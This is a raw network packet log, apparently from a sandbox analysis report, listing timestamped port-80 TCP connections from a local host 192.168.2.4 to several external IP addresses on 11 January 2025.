                                                                                                                                      Jan 11, 2025 09:38:58.165889978 CET5004480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:38:58.169168949 CET5004480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:38:58.174417019 CET805004413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:03.566571951 CET5004580192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:03.571436882 CET805004554.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:03.571499109 CET5004580192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:03.588176012 CET5004580192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:03.592972040 CET805004554.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:04.165417910 CET805004554.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:04.165443897 CET805004554.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:04.165529013 CET5004580192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:05.092736959 CET5004580192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:06.113310099 CET5004680192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:06.118237019 CET805004654.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:06.118405104 CET5004680192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:06.136496067 CET5004680192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:06.141335011 CET805004654.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:06.714787960 CET805004654.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:06.714910030 CET805004654.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:06.714967012 CET5004680192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:07.639636993 CET5004680192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:08.658411026 CET5004780192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:08.663434029 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.663690090 CET5004780192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:08.681613922 CET5004780192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:08.686399937 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686435938 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686454058 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686464071 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686475039 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686635017 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686642885 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686664104 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:08.686700106 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:09.277791023 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:09.277825117 CET805004754.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:09.277888060 CET5004780192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:10.186630964 CET5004780192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.205172062 CET5004880192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.210277081 CET805004854.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:11.211278915 CET5004880192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.219958067 CET5004880192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.224767923 CET805004854.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:11.812021971 CET805004854.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:11.812118053 CET805004854.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:11.812195063 CET5004880192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.815470934 CET5004880192.168.2.454.67.42.145
                                                                                                                                      Jan 11, 2025 09:39:11.820388079 CET805004854.67.42.145192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:16.847296953 CET5004980192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:16.852261066 CET8050049193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:16.855340004 CET5004980192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:16.869918108 CET5004980192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:16.875377893 CET8050049193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:17.513962984 CET8050049193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:17.514029026 CET8050049193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:17.514085054 CET5004980192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:18.373977900 CET5004980192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:19.393508911 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:19.435765028 CET8050050193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:19.435856104 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:19.451745987 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:19.456754923 CET8050050193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:20.076097965 CET8050050193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:20.076141119 CET8050050193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:20.076175928 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:20.967916965 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:21.987760067 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:21.992667913 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:21.992729902 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:22.018497944 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:22.023418903 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023433924 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023514986 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023525953 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023535013 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023669004 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023711920 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.026909113 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.026918888 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.623862982 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.624547958 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.624784946 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:23.530359983 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.553919077 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.559300900 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:24.559370995 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.570935011 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.579278946 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214323044 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214345932 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214471102 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:25.218029022 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:25.222764969 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:30.469423056 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.474313974 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:30.474390030 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.491816998 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.496725082 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:31.016468048 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:31.016515017 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:32.002238035 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:32.007827997 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.019251108 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.024436951 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.024528027 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.043699980 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.048568964 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.569820881 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.575397968 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:34.545840979 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:34.551037073 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.564826965 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.569791079 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.569875956 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.587279081 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.592303991 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592339039 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592365980 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592416048 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592442989 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592483044 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592530966 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592557907 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592583895 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:36.087635994 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:36.089385033 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:37.092885017 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:37.097790003 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:38.115242958 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.120106936 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:38.120259047 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.129260063 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.134161949 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184936047 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184967995 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184984922 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185003996 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185014963 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185038090 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185050964 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185061932 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185074091 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185086012 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185112953 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.185158014 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.189982891 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190084934 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190119028 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190130949 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.190152884 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190224886 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.273402929 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273422003 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273441076 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273452997 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273551941 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.273741007 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273775101 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.279285908 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.284094095 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.300744057 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.305681944 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.305941105 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.322094917 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.327003002 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937340975 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937367916 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937413931 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.937665939 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937683105 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937719107 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:45.827322960 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.846914053 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.851856947 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:46.851939917 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.871189117 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.876046896 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397185087 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397242069 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397325993 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:47.397471905 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397552013 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:48.374001980 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.392641068 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.397674084 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.397763968 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.414685965 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.419786930 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419804096 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419827938 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419840097 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419946909 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419959068 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420039892 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420063019 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420198917 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019889116 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019906044 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019923925 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.020080090 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:50.920856953 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.939532995 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.944403887 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:51.944560051 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.953730106 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.958790064 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:52.587037086 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:52.587058067 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:52.587233067 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:52.587359905 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:52.587424994 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:52.590184927 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:52.594970942 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:01.097512007 CET5006180192.168.2.415.197.142.173
                                                                                                                                      Jan 11, 2025 09:40:01.102415085 CET805006115.197.142.173192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:01.103374004 CET5006180192.168.2.415.197.142.173
                                                                                                                                      Jan 11, 2025 09:40:01.112095118 CET5006180192.168.2.415.197.142.173
                                                                                                                                      Jan 11, 2025 09:40:01.116986036 CET805006115.197.142.173192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:01.576699972 CET805006115.197.142.173192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:01.576765060 CET805006115.197.142.173192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:01.576894045 CET5006180192.168.2.415.197.142.173
                                                                                                                                      Jan 11, 2025 09:40:01.579425097 CET5006180192.168.2.415.197.142.173
                                                                                                                                      Jan 11, 2025 09:40:01.587023020 CET805006115.197.142.173192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:06.596883059 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:06.601793051 CET8050062104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:06.607263088 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:06.623487949 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:06.628388882 CET8050062104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:07.209880114 CET8050062104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:07.210459948 CET8050062104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:07.210578918 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:07.210587978 CET8050062104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:07.210702896 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:08.124170065 CET5006280192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:09.143280983 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:09.148580074 CET8050063104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:09.148737907 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:09.163280964 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:09.172266960 CET8050063104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:09.781738997 CET8050063104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:09.782279015 CET8050063104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:09.782320976 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:09.782346964 CET8050063104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:09.782397985 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:10.670892000 CET5006380192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:11.689960003 CET5006480192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:11.694957972 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.695163012 CET5006480192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:11.710021019 CET5006480192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:11.715109110 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715125084 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715132952 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715142012 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715161085 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715168953 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715193033 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715200901 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:11.715212107 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:12.324444056 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:12.324934959 CET8050064104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:12.325907946 CET5006480192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:13.217802048 CET5006480192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.236730099 CET5006580192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.241652012 CET8050065104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:14.241786957 CET5006580192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.250885963 CET5006580192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.255867958 CET8050065104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:14.833726883 CET8050065104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:14.834604025 CET8050065104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:14.834724903 CET5006580192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.838242054 CET5006580192.168.2.4104.21.80.1
                                                                                                                                      Jan 11, 2025 09:40:14.843097925 CET8050065104.21.80.1192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:19.846889973 CET5006680192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:19.851913929 CET805006613.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:19.852912903 CET5006680192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:19.870510101 CET5006680192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:19.875425100 CET805006613.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:20.327718973 CET805006613.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:20.327862978 CET805006613.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:20.328093052 CET5006680192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:21.374020100 CET5006680192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:22.393732071 CET5006780192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:22.398694992 CET805006713.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:22.398787022 CET5006780192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:22.414813995 CET5006780192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:22.419719934 CET805006713.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:22.859435081 CET805006713.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:22.859510899 CET805006713.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:22.859592915 CET5006780192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:23.920921087 CET5006780192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:24.939203024 CET5006880192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:24.944149017 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.944235086 CET5006880192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:24.961946011 CET5006880192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:24.966890097 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.966901064 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.966908932 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.966917038 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.967025042 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.967034101 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.967042923 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.967058897 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:24.967068911 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:26.467730999 CET5006880192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:26.514004946 CET805006813.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:27.487555027 CET5006980192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:40:27.492492914 CET805006913.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:40:27.492744923 CET5006980192.168.2.413.248.169.48
